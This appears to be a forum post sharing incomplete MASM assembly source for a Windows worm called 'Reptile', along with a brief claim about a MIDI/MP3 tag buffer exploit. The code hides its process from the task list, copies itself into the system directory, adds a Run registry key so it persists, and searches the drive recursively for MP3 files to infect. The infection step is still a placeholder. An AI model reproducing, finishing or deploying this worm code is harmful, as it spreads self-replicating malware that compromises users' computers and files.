There is an exploit for midi files changing the tags and setting the buffer to 0xfffffffff as for mp3
.386
.Model Flat ,StdCall
option casemap:none
include ..\..\include\windows.inc
include ..\..\include\kernel32.inc
include ..\..\include\user32.inc
include ..\..\include\advapi32.inc
includelib ..\..\lib\kernel32.lib
includelib ..\..\lib\user32.lib
includelib ..\..\lib\advapi32.lib
.Data
residentname db "\SYSLOAD.EXE",0
regserviceproc db "RegisterServiceProcess",0
kernel32str db "kernel32.dll",0
subkey db "Software\Microsoft\Windows\CurrentVersion\Run",0
keyname db "Reptile",0
searchpattern db "???*",0
rootdir db "\",0
previousdir db "..",0
.Data?
searchindex dd ?
wormlocation dd ?
keyhandle dd ?
finddata WIN32_FIND_DATA <>
systemdir db MAX_PATH dup(?)
searchhandles db 3FCh dup(?) ;255 dwords
.Code
Main:
nop
worm_start:
mov eax,worm_end - worm_start
;=======Hide myself from "Close Program" Dialog=======
invoke LoadLibraryA,addr kernel32str
invoke GetProcAddress,eax,addr regserviceproc
push 1
push NULL
call eax
;==============Find the Name/path of the worm=========
invoke GetCommandLine
inc eax
xor edx,edx
xchg eax,esi
mov edi,esi
GetNextChar:
lodsb
cmp al,'"'
je FoundEnd
cmp al, 00h
jne GetNextChar
push 7
pop edx
FoundEnd:
dec esi
xchg esi,edi
xor eax,eax
stosb
test edx,edx
je NoQuotes
dec esi
NoQuotes:
mov wormlocation,esi
;==============Copy it to the system directory========
invoke GetSystemDirectory, addr systemdir, SIZEOF systemdir
invoke lstrcat, addr systemdir, addr residentname
invoke CopyFile, wormlocation, addr systemdir, FALSE
;==============Make it run when Windows starts========
invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr subkey, NULL, \
NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, \
addr keyhandle, NULL
invoke lstrlen, addr systemdir
invoke RegSetValueEx, keyhandle, addr keyname, NULL, REG_SZ, \
addr systemdir, eax
invoke SetCurrentDirectory,addr rootdir
Call FindVictims
;==============Clean Up===============================
invoke RegCloseKey, keyhandle
invoke MessageBoxA,NULL, addr keyname,NULL,MB_OK
invoke ExitProcess,NULL
;==============Find MP3 files to infect===============
FindVictims proc
invoke FindFirstFile, addr searchpattern, addr finddata
inc eax
je BackOneDir
dec eax
inc searchindex
mov ecx, searchindex
lea edi, [searchhandles+4*ecx]
stosd
xchg ebx,eax
jmp CallParseRoutine
FindNext:
invoke FindNextFile, ebx, addr finddata
test eax,eax
je FinishSearch
CallParseRoutine:
Call ParseResult
jmp FindNext
FinishSearch:
invoke FindClose, ebx
dec searchindex
mov ecx, searchindex
test ecx,ecx
je SearchFinished
lea esi, [searchhandles+4*ecx]
lodsd
xchg eax,ebx
BackOneDir:
invoke SetCurrentDirectory, addr previousdir
SearchFinished:
ret
FindVictims endp
;==============Process result of FindFile*============
ParseResult proc
lea edi, finddata.cFileName
invoke CharLower, edi
invoke lstrlen, edi
lea esi, [finddata.cFileName-4+eax]
lodsd
sub eax, '3pm.' ;Infect MP3 Files
jne NotMp3
invoke MessageBoxA,NULL,edi,NULL,MB_OK ;'Twas an MP3
NotMp3:
and finddata.dwFileAttributes,FILE_ATTRIBUTE_DIRECTORY
je NotDirectory
mov word ptr [finddata.cFileName-2], "\."
invoke SetCurrentDirectory,addr finddata.cFileName-2
Call FindVictims
NotDirectory:
ret
ParseResult endp
worm_end:
End Main
Still in construction but there are lots of holes and it would like jonconley said be software dependant etc..